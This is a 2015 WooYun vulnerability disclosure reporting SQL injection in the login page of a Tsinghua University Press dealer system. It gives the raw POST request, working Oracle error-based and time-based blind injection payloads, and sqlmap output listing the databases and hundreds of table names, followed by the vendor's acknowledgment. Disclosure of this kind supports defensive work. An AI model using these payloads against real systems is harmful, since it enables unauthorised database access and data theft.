当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112868

漏洞标题:清华大学某系统存在SQL注入

相关厂商:清华大学

漏洞作者: 深度安全实验室

提交时间:2015-05-08 15:29

修复时间:2015-06-25 10:08

公开时间:2015-06-25 10:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

欢迎 清华大学 加入 WooYun 大家庭

详细说明:

漏洞证明:

1.清华大学出版社 经销商服务系统

http://dealer.tup.tsinghua.edu.cn/


2.登录地方存在SQL注入,其中,UNO参数有问题

POST /login.asp HTTP/1.1
Host: dealer.tup.tsinghua.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://dealer.tup.tsinghua.edu.cn/
Cookie: safedog-flow-item=D961C6F6956C1C8A4C58645CF414C7F2; ASPSESSIONIDSCARBCCQ=CKHFGPPBDCKFIABCDLAEOFBN
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
UNO=a&Password=a&Submit=++++++


3.运行sqlmap,确认注入存在

1.png


4.库:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: UNO
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: UNO=a' AND 1575=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)||CHR(119)||CHR(100)||CHR(113)||(SELECT (CASE WHEN (1575=1575) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(97)||CHR(106)||CHR(100)||CHR(113)) AND 'aSTw'='aSTw&Password=a&Submit=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: UNO=a' AND 4615=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(107)||CHR(84)||CHR(85),5) AND 'wFUV'='wFUV&Password=a&Submit=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
available databases [21]:
[*] AURORA$JIS$UTILITY$
[*] CB
[*] CDZ_CBS
[*] CTXSYS
[*] CW
[*] DEMO
[*] ERP
[*] FX
[*] FXOLD
[*] LAB
[*] MDSYS
[*] MTSSYS
[*] ORDSYS
[*] OSE$HTTP$ADMIN
[*] OUTLN
[*] QHCBS
[*] SCOTT
[*] SYS
[*] SYSTEM
[*] TOAD
[*] ZJSD1


CDZ_CBS库中的表:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: UNO
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: UNO=a' AND 1575=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(111)||CHR(119)||CHR(100)||CHR(113)||(SELECT (CASE WHEN (1575=1575) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(97)||CHR(106)||CHR(100)||CHR(113)) AND 'aSTw'='aSTw&Password=a&Submit=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: UNO=a' AND 4615=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(107)||CHR(84)||CHR(85),5) AND 'wFUV'='wFUV&Password=a&Submit=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
Database: CDZ_CBS
[477 tables]
+--------------------------------+
| CAO |
| EN_YS |
| EPC_CLI_COLLECTION |
| EPC_CLI_COLLECT_BY_EVENTID |
| EPC_CLI_COLLECT_BY_USERID |
| EPC_CLI_ENVIRONMENT |
| EPC_CLI_ENVIRONMENT_VERSION |
| EPC_CLI_FDF_FILE |
| EPC_CLI_FORMAT |
| EPC_CLI_JOB |
| EPC_CLI_NODE |
| EPC_CLI_PROGRESS |
| EPC_CLI_REP_USERS |
| EPC_CLI_SERVICE |
| EPC_CLI_USAGE |
| EPC_CLI_VERSION |
| EPC_MULTI_VIEWS |
| EPC_MULTI_VIEW_MAP |
| EPC_MVIEW_CATEGORY_MAP |
| EPC_PRIMARY_ITEMS |
| EPC_TDV_VERSION |
| EPC_VIEW |
| EPC_VIEW_CATEGORY |
| EPC_VIEW_ITEMS |
| EPC_VIEW_PREFERENCES |
| FX_YMXDDHG |
| FX_ZFJB |
| HS_BGFY |
| HS_BJCB |
| HS_BJXX |
| HS_BMYS |
| HS_CBCB |
| HS_CBSXX |
| HS_CSXX |
| HS_CWRCFY |
| HS_CYLCXX |
| HS_DZDXB |
| HS_FUNC |
| HS_GCCB |
| HS_HSBM |
| HS_JCCCB |
| HS_JCSXB |
| HS_KCLXB |
| HS_OAQQ |
| HS_PRINT_SET |
| HS_QUERY_TJ |
| HS_ROLES |
| HS_ROLES_GRANTS |
| HS_SBXZB |
| HS_SELECT_VALUES |
| HS_TEST |
| HS_TEST1 |
| HS_TEST2 |
| HS_TSBBB |
| HS_TSGXZ |
| HS_TSHJXX |
| HS_TSLB |
| HS_TSSP |
| HS_TSXX |
| HS_TSYCXX |
| HS_USERS |
| HS_USER_GRANTS |
| HS_USER_ROLES |
| HS_WZSMXZ |
| HS_XKLXB |
| HS_XMLYB |
| HS_XMMBB |
| HS_XTJBB |
| HS_XTXX |
| HS_YCBHZ |
| HS_YCBHZ_TEMP |
| HS_YQCB |
| HS_YQXMB |
| HS_YQZQMXB |
| HS_YXCB |
| HS_YZCB |
| HS_YZTZDB |
| HS_ZHBBCSSZ |
| HS_ZPLXB |
| HS_ZSYYB |
| HS_ZTFB |
| HS_ZYLXB |
| HS_ZYSFLB |
| HS_ZZK |
| KH_DQB |
| KH_FKB |
| KH_FKTSB |
| KH_JSCBQKB |
| KH_JSGTQKB |
| KH_JSHDQKB |
| KH_JSKCXXB |
| KH_JSLPQKB |
| KH_JSXTJHB |
| KH_JSXXB |
| KH_JSYJLYB |
| KH_JSYSQKB |
| KH_KCXXB |
| KH_KHDJ |
| KH_SFB |
| KH_XXB |
| KH_XXLX |
| KH_YXB |
| KH_YXDB |
| KH_YXDBQX |
| KH_ZJSZB |
| KH_ZJYSB |
| KH_ZYB |
| KH_ZYFL |
| KH_ZYXF |
| PLAN_TABLE |
| QK_ADMIN |
| QK_FAVORITE |
| QK_FILE |
| QK_NEWSARTICLE |
| RL_BZMCB |
| RL_GWMCB |
| RL_MZB |
| RL_XLB |
| RL_ZBMCB |
| RL_ZCB |
| RL_ZWB |
| RL_ZZMMB |
| SMP_DBREPORT_SQLSCRIPTS |
| SMP_DBREPORT_TEMPLATE |
| SMP_LMV_DISPLAY_OPTION |
| SMP_LMV_REDO_LOG |
| SMP_LMV_SEARCH_OBJECT |
| SMP_LMV_SEARCH_RESULT |
| SMP_LOG_SQL |
| SMP_STANDBY_CONFIG_INFO |
| SMP_STANDBY_SITE_INFO |
| SMP_VAI_DBCONFIG |
| SMP_VAR_EBU_ACTIVE_JOB_ |
| SMP_VAR_EBU_SAVED_JOB_ |
| SMP_VAR_OS_ACTIVE_JOB_ |
| SMP_VAR_OS_SAVED_JOB_ |
| SMP_VAR_SMR_ACTIVE_JOB_ |
| SMP_VAR_SMR_CHANNEL_DEVICE_ |
| SMP_VAR_SMR_DEFAULT_CHANNEL_ |
| SMP_VAR_SMR_LIST_DATABASES_ |
| SMP_VAR_SMR_RC_CONNECT_STRING_ |
| SMP_VAR_SMR_SAVED_JOB_ |
| SMP_VAR_SMR_TEMP_SCRIPTS_ |
| SMP_VBOR_BACKUP_CONFIGURATION |
| SMP_VBOR_BLOB |
| SMP_VBOR_CHANNELS_INFORMATION |
| SMP_VBOR_DEFAULT_CONFIG |
| SMP_VBOR_STRATEGY_INFORMATION |
| SMP_VBO_JOB_CONFIG_TABLE |
| SMP_VBO_REPORTS |
| SMP_VBO_REPORTS_CONFIG |
| SMP_VBO_REPORTS_TYPE_DEFN |
| SMP_VBO_REPORT_ELEMENTS |
| SMP_VBO_REPORT_INFO_SOURCES |
| SMP_VDD_OPERATIONS_TABLE |
| SMP_VDE_EVENT |
| SMP_VDE_EVENT_ARCHIVE |
| SMP_VDE_EVENT_ARCHIVE_PURGE |
| SMP_VDE_EVENT_DETAILS |
| SMP_VDE_EVENT_LOCK_TAB |
| SMP_VDE_EVENT_LOG |
| SMP_VDE_EVENT_OCCURRENCE |
| SMP_VDE_EVENT_OCCUR_DETAILS |
| SMP_VDE_EVENT_TARGET_ACK |
| SMP_VDE_EVENT_TARGET_DETAILS |
| SMP_VDE_EVENT_TARGET_INFO |
| SMP_VDE_EVENT_TARGET_STATE |
| SMP_VDE_EVENT_UPDOWN_QUEUE |
| SMP_VDE_METRIC_THRESHOLDS |
| SMP_VDE_NODE_UPDOWN_QUEUE |
| SMP_VDE_THRESHOLD_ASSOC |
| SMP_VDE_TRY_REMOVE_EVENT_QUEUE |
| SMP_VDF_MASLIST |
| SMP_VDG_EVENTID_MAP |
| SMP_VDG_EVENT_DELETE_LIST |
| SMP_VDG_EVENT_NOTIF_LIST |
| SMP_VDG_GATEWAY_MAP |
| SMP_VDG_JOBID_MAP |
| SMP_VDG_NODE_LIST |
| SMP_VDG_NODE_LOCK_TABLE |
| SMP_VDI_AOBJECT_NOTIFICATION |
| SMP_VDI_OBJECT_TABLE |
| SMP_VDI_POS |
| SMP_VDI_TARGET_PROPERTIES |
| SMP_VDJ_JOB |
| SMP_VDJ_JOB_LOCK |
| SMP_VDJ_JOB_LOG |
| SMP_VDJ_JOB_LOG_COMMENT |
| SMP_VDJ_JOB_LOG_INTERMED |
| SMP_VDJ_JOB_OUTPUT |
| SMP_VDJ_JOB_PER_TARGET |
| SMP_VDJ_JOB_TARGET |
| SMP_VDM_ADDRESS |
| SMP_VDM_GLOBAL_INFO |
| SMP_VDM_LAST_NOTIF_SEQ_PERTYPE |
| SMP_VDM_NOTIFICATION |
| SMP_VDM_NOTIFICATION_DETAILS |
| SMP_VDM_NOTIFICATION_NVPAIRS |
| SMP_VDM_NOTIFICATION_SERVICES |
| SMP_VDM_PAGING_CARRIER_INFO |
| SMP_VDM_SESSION_NOTIFTYPE_PAIR |
| SMP_VDN_BLACKOUTSCHEDULE |
| SMP_VDN_GROUP_GROUP |
| SMP_VDN_GROUP_LIST |
| SMP_VDN_GROUP_TARGET |
| SMP_VDN_NODE_LIST |
| SMP_VDN_NOTIFY |
| SMP_VDN_STATE |
| SMP_VDN_TARGET_LIST |
| SMP_VDN_TARGET_PROPERTIES |
| SMP_VDN_TARGET_TYPE_DEFN |
| SMP_VDO_JOBID_SERVICEID |
| SMP_VDP_NODES |
| SMP_VDP_NODE_INFO |
| SMP_VDP_NODE_INFO_VDD |
| SMP_VDP_NODE_OMS_MAP |
| SMP_VDP_OMS_NUM_NODES |
| SMP_VDP_OMS_REGION_MAP |
| SMP_VDP_PGSRV_REGION_MAP |
| SMP_VDP_REGIONS |
| SMP_VDR_REGISTRY |
| SMP_VDS_REPOS_VERSION |
| SMP_VDS_SESSIONS_TABLE |
| SMP_VDU_CALLBACK_TABLE |
| SMP_VDU_OBJECTS_TABLE |
| SMP_VDU_PRINCIPALS_TABLE |
| SMP_VDU_PRIVILEGE_TABLE |
| SMP_VDV_DEFAULT_NOTIFY_PREFS |
| SMP_VDV_DEFAULT_PERMISSIONS |
| SMP_VDV_GENERAL |
| SMP_VDV_MAPI_EMAIL |
| SMP_VDV_NOTIFICATION_SCHEDULE |
| SMP_VDV_PAGE |
| SMP_VDV_PAGING |
| SMP_VDV_PREFERRED_CREDENTIALS |
| SMP_VDV_SERVICE_PARMS |
| SMP_VDV_SMTP_EMAIL |
| SMP_VDV_USER |
| SMP_VDV_USER_LOCALE |
| SMP_VDV_USER_PREF |
| SMP_VTA_DB_APP_POSITION_ |
| SMP_VTC_LAYOUT_PROPERTIES |
| SMP_VTD_CLIENT_STATE |
| SMP_VTD_DG_LOCATION |
| SMP_VTD_HISTORICAL_LOCATION |
| SMP_VTM_CHART_DEFN |
| SMP_VTM_CHART_STATE_TARG_SPEC |
| SMP_VTM_DISPLAY_STATE |
| SMP_VTM_RECORDING_DATA |
| SMP_VTM_UDCHART_COLUMNS |
| SMP_VTM_UDCHART_DEFN |
| SMP_VTP_UDCLASS_COLUMNS |
| SMP_VTP_UDCLASS_DEFN |
| SMP_VXA_SYSTEM_PREFS |
| TB_ADMIN |
| TB_BOOK |
| TB_CATEGORY |
| TB_NEWSARTICLE |
| VBZ$CHANGE_PLANS |
| VBZ$COMPARISONS |
| VBZ$COMPARISON_RESULTS |
| VBZ$DB_OBJ_NAMES |
| VBZ$DESTINATIONS |
| VBZ$DIRECTIVES |
| VBZ$EDITED_SCRIPTS |
| VBZ$EXEMPLARS |
| VBZ$EX_UPDATES |
| VBZ$HISTORY |
| VBZ$IMPACT_LOG |
| VBZ$OBJECT_GRANTS |
| VBZ$OUTPUT_LOG |
| VBZ$ROLE_GRANTS |
| VBZ$SCHEMAMAPS |
| VBZ$SCRIPTS |
| VBZ$SYS_PRIV_GRANTS |
| VBZ$VERSION |
| VDK_APPLICATION |
| VDK_CLUSTER |
| VDK_CLUSTER_COLUMN |
| VDK_COLLECTION_ITEMS |
| VDK_COLUMN |
| VDK_CONSTRAINT |
| VDK_CONSTRAINT_COLUMN |
| VDK_DATABASE |
| VDK_DATAFILE |
| VDK_DATAFILE_STATS |
| VDK_DATAFILE_STATS_BEGIN |
| VDK_DBUSER |
| VDK_DELETE_QUEUE |
| VDK_FUNCTION |
| VDK_HOST_INFO |
| VDK_INDEX |
| VDK_INDEX_COLUMN |
| VDK_IND_PARTITIONS |
| VDK_IND_SUBPARTITIONS |
| VDK_INSTANCE |
| VDK_INSTANCE_BUFFER_STATS |
| VDK_INSTANCE_BUFFER_STATS_B |
| VDK_INSTANCE_PARAMS |
| VDK_INSTANCE_ROLLBACK_STATS |
| VDK_INSTANCE_SORT_STATS |
| VDK_INSTANCE_STATS |
| VDK_INSTANCE_STATS_BEGIN |
| VDK_LOG_TABLE |
| VDK_OBJECT |
| VDK_PART_INDEXES |
| VDK_PART_KEY_COLUMNS |
| VDK_PART_TABLES |
| VDK_REP_CONTROL |
| VDK_REQUEST |
| VDK_SEGMENT |
| VDK_SEQUENCE |
| VDK_SERVICE |
| VDK_SESSION |
| VDK_SQL |
| VDK_SQL_OBJECTS |
| VDK_SQL_STATEMENT_WORK |
| VDK_STORAGE_DEVICE |
| VDK_SUBPART_KEY_COLUMNS |
| VDK_SYNONYM |
| VDK_TABLE |
| VDK_TABLESPACE |
| VDK_TAB_PARTITIONS |
| VDK_TAB_SUBPARTITIONS |
| VDK_TMP_ANALYSIS_5 |
| VDK_TMP_ANALYSIS_6 |
| VDK_TMP_ANALYSIS_7 |
| VDK_TMP_JOURNAL_5 |
| VDK_TMP_JOURNAL_6 |
| VDK_TMP_JOURNAL_7 |
| VDK_TMP_RECOMMENDATION_5 |
| VDK_TMP_RECOMMENDATION_6 |
| VDK_TMP_RECOMMENDATION_7 |
| VDK_TMP_RULE_JOURNAL_5 |
| VDK_TMP_RULE_JOURNAL_6 |
| VDK_TMP_RULE_JOURNAL_7 |
| VDK_TMP_SQLCOLUMNREF_5 |
| VDK_TMP_SQLCOLUMNREF_6 |
| VDK_TMP_SQLCOLUMNREF_7 |
| VDK_TMP_SQLDEPEND_5 |
| VDK_TMP_SQLDEPEND_6 |
| VDK_TMP_SQLDEPEND_7 |
| VDK_TMP_SQLHINTREF_5 |
| VDK_TMP_SQLHINTREF_6 |
| VDK_TMP_SQLHINTREF_7 |
| VDK_TMP_SQLINDEX_5 |
| VDK_TMP_SQLINDEX_6 |
| VDK_TMP_SQLINDEX_7 |
| VDK_TMP_SQLTABLEREF_5 |
| VDK_TMP_SQLTABLEREF_6 |
| VDK_TMP_SQLTABLEREF_7 |
| VDK_TMP_SQLTABLE_5 |
| VDK_TMP_SQLTABLE_6 |
| VDK_TMP_SQLTABLE_7 |
| VDK_TMP_SQLTEXT_5 |
| VDK_TMP_SQLTEXT_6 |
| VDK_TMP_SQLTEXT_7 |
| VDK_TMP_SQLXREF_5 |
| VDK_TMP_SQLXREF_6 |
| VDK_TMP_SQLXREF_7 |
| VDK_USER_RULE |
| VMQ_DATABASE_PARAMS_DYNAMIC |
| VMQ_DATABASE_PARAMS_STATIC |
| VMQ_SQL_FAKE_INDEX |
| VMQ_SQL_FAKE_INDEX_COLUMNS |
| VMQ_SQL_IMPORT_STATS |
| VMQ_SQL_ITEM |
| VMQ_SQL_PLAN_COST_ALL |
| VMQ_SQL_PLAN_COST_FIRST |
| VMQ_SQL_PLAN_RULE |
| VMQ_SQL_STATS_COST_ALL |
| VMQ_SQL_STATS_COST_FIRST |
| VMQ_SQL_STATS_RULE |
| VMQ_SQL_TEXT |
| VMQ_SQL_UNQUALIFIED_NAMES |
| WWW_BBS |
| WWW_FORUM |
| WWW_FORUMTYPE |
| WWW_KXFZ |
| WWW_NEWS |
| WWW_NEWSCLASS |
| WWW_OA |
| WWW_OACLASS |
| WWW_PUBLICMESSAGE |
| WWW_REGUSER |
| WWW_SQ |
| WWW_TCLASS |
| WWW_USERS |
| WWW_XGTS |
| YZ_CYXSB |
| YZ_DKJCB |
| YZ_DKJCXMB |
| YZ_FMHTB |
| YZ_FMZLB |
| YZ_FUMOHTB |
| YZ_FUMOHTMXB |
| YZ_FWBB |
| YZ_FYTZB |
| YZ_FYTZMXB |
| YZ_FYTZZZB |
| YZ_KBB |
| YZ_MQHTB |
| YZ_MSHTB |
| YZ_MSHTMXB |
| YZ_MSZLB |
| YZ_PTHTB |
| YZ_QGHTB |
| YZ_RRHTB |
| YZ_SDDDB |
| YZ_SFHTB |
| YZ_SFHTMXB |
| YZ_SGJLB |
| YZ_SQHTB |
| YZ_TJGYHTB |
| YZ_TJHTMXB |
| YZ_TJZLB |
| YZ_TZFYJS |
| YZ_TZFYXMB |
| YZ_UVHTB |
| YZ_UVHTMXB |
| YZ_UVZLB |
| YZ_YAHTB |
| YZ_YHHTB |
| YZ_YSHTB |
| YZ_YSHTPBB |
| YZ_YSHTSSB |
| YZ_YSJCB |
| YZ_YSJCXMB |
| YZ_YSSSB |
| YZ_YSXMB |
| YZ_YWHTB |
| YZ_YWZLB |
| YZ_YZDB |
| YZ_YZDGYB |
| YZ_YZDSSAPB |
| YZ_YZDYSXMB |
| YZ_YZFYB |
| YZ_YZFYJS |
| YZ_YZFYJSB |
| YZ_YZFYJS_PRINT |
| YZ_YZFYMXB |
| YZ_YZFYMXB_TEST |
| YZ_YZYB |
| YZ_ZDFSB |
| YZ_ZDFYJS |
| YZ_ZDFYTZB |
| YZ_ZDHTB |
| YZ_ZDHTSFDJB |
| YZ_ZDHTYZDJB |
| YZ_ZDXMB |
| YZ_ZWCXB |
| ZZ_CKDB |
| ZZ_CYZZB |
| ZZ_GGB |
| ZZ_GYSB |
| ZZ_KZB |
| ZZ_MCB |
| ZZ_SLKB |
| ZZ_ZZBCDB |
| ZZ_ZZCGDDB |
| ZZ_ZZCKDB |
| ZZ_ZZDBDB |
| ZZ_ZZHTB |
| ZZ_ZZHTMXB |
| ZZ_ZZJSB |
| ZZ_ZZJXCB |
| ZZ_ZZJXCB1 |
| ZZ_ZZKCB |
| ZZ_ZZPDDB |
| ZZ_ZZRKDB |
| ZZ_ZZSHTZB |
| ZZ_ZZTJB |
| ZZ_ZZTJBTEST |
| ZZ_ZZTJMXB |
| ZZ_ZZTJMXBTEST |
| ZZ_ZZYMPHJC |
| ZZ_ZZYMPHJC1 |
+--------------------------------+

101.png

123.png

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-05-11 10:06

厂商回复:

谢谢提醒,我们会尽快修复此漏洞。

最新状态:

暂无